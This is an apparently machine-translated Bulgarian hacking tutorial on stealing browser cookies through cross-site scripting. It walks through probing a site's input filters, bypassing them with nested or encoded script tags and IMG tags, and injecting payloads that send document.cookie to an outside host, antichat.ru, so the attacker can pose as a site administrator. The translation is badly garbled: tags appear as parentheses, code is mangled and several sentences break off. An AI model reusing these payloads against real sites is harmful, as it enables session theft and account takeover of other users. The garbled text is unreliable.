Кражбата бисквитка от XSS
XSS този Css =) Cross Site Scripting
Да не се бърка с CSS наричан XSS
Какво е бисквитка и защо XSS?
Cookie - е обикновен текстов файл на клиентската машина и се използва за съхраняване на информация сървър.
Например, след като се регистрирате и да влезете във форума, сайтът съхранява в информацията за бисквитка за теб. Там обикновено съхранява информация за
вашия потребител и парола. По-късно форум чете данните и дефинира. Друг пример: вие сте администратора на сайта, и аз
проста за употреба. Но ако мога да променям данните на собствения си, аз също ще се определя от системата като администратор. Затова
трябва да бъде в състояние да открадне същите тези бисквитки.
Какво е XSS атака?
XSS атаки - това е атака не на самото място, но от потребителите на сайта.
XSS - това е дефект в прилагането на филтъра.
Има пасивна и активна XSS XSS.
Пасивно - това XSS, които изискват прякото участие на жертвите имат специфичен +
ограничения и сложност. Ето защо, пасивен XSS не се цени високо. Например, трябва да я получите, за да отидете на отровни връзка
Active - е XSS, които не изискват никакви допълнителни действия от страна на жертвата - това е достатъчно
трябва само да отворите страницата с XSS и Java код ще се изпълни автоматично. Благодарение на автоматизация - те са много полезни и ценни.
Например, активното ХСС съществуват в ББ- тагове, поради недостатъчен филтриране, когато оставяте съобщение на forumegostevuhechate,
който е винаги активно с всяка актуализация.
Как да намерите XSS на този сайт?
Опитвайки се да се поставите, където е възможно върху етикет сайт (скрипт) предупреждение () (/ скрипт). Ако напусна съобщение,
след това заредете сценария, и сте намерили XSS.
Помислете за друг XSS ") (скрипт) предупреждение () (/ скрипт) Какво се случва в същото време :. Ние
Затварящият таг ") (вероятно някои променлива се определя с текста, че ние сме за въвеждане в матрицата) и се изпълнява
Как да се определи дали е филтъра?
За да направите това, всички полета за въвеждане "; -" (Fuck) =
След това отворете страницата и за думата дяволите, както и другите герои изглеждат:
Ако () наляво, това е първият признак на уязвимост. Ако има герои ''. Това е вторият знак
Ако не можете да намерите (), е вероятно, че те изяде филтър. Е, ако те са били заменени с други герои, а след това уви,
Филтър работи добре.
Какво става, ако филтъра лястовици ().
Ние се опитваме да вмъкнете (kdgfjdgfd), изглежда, ако се погълне - поставете битка сценария.
Има и начини да се инвестират сценария: (SC (скрипт) ript) предупреждение () (/ SC (/ скрипт) ript). Това ще ви помогне, когато
филтъра не е много силна.
Това се случва, че филтърът се брои броя отворени и затворени тагове и се затваря в себе, а след това ще ви помогне:
Често се случва, че филтъра завърши сценария, например като този:
Можете да се опитате да използвате различно кодиране и се опитват да се кодира скрипт.
Ние трябва да се опитаме на пробата и грешката.
Ние трябва да се опитаме да въведете различни стойности, виж това, което имаме от филтъра. метод tykov да се разбере как работи филтъра,
какви дефекти му. Ако лош филтър, винаги е възможно да се вмъкне сценария.
Например, само упълномощени етикети могат да бъдат използвани в сайта, след което се крие зад тях имат възможност да го изпълняват. Например, този маркер
IMG, URL адрес. Целият смисъл е, че ние трябва да поставите нашето искане в създаването IMG или URL адрес. Img Имаме много опции
с изключение на ALT и SRC, които могат да бъдат използвани в книгата за гости и форумите.
Помислете за активно XSS
Намерени XSS и активен вместо предупреждение (), можете да вмъкнете скрипт
Ако филтърът не е предал да опитате това:
На тази страница от началото на този маркер:
В действителност, на сигнала () няма да направи нищо полезно (това е необходимо само да се провери). Но самата сценария:
Той вече е кражба бисквитки
е могъл да замести:
където ") (скрипт) IMG = нова снимка (); img.src = "? http://antichat.ru/cgi-bin/s.jpg" + document.cookie; сценария
2) по-сигурен скрипт като например:
вече има жалба до My.js файл, който съдържа
(Сценарий) IMG = нова снимка (); img.src = "? http://antichat.ru/cgi-bin/s.jpg" + document.cookie;
Така че по-безопасно.
Понякога, когато трябва да криптирате. Ето например:
След това се обадете на файла, например 1.jpg и място на сайта. Реакцията е както следва:
По това време ние завърши линии
ни боравене с документи за обучени да изпрати бисквитка.
Между другото, за разлика от част от процеса, този образ не е изведен
под формата на кръст, като същата има скрит атрибут (стил = дисплей: няма), а в случай на размер 1x1. След получаване на бисквитката, без да ни
По избор: ако мине през IE, сценария ще работи, а ако в Opera, сценарият не работи и ще премине. И ако не го преименувате HTML, а след това на операта ще работи също.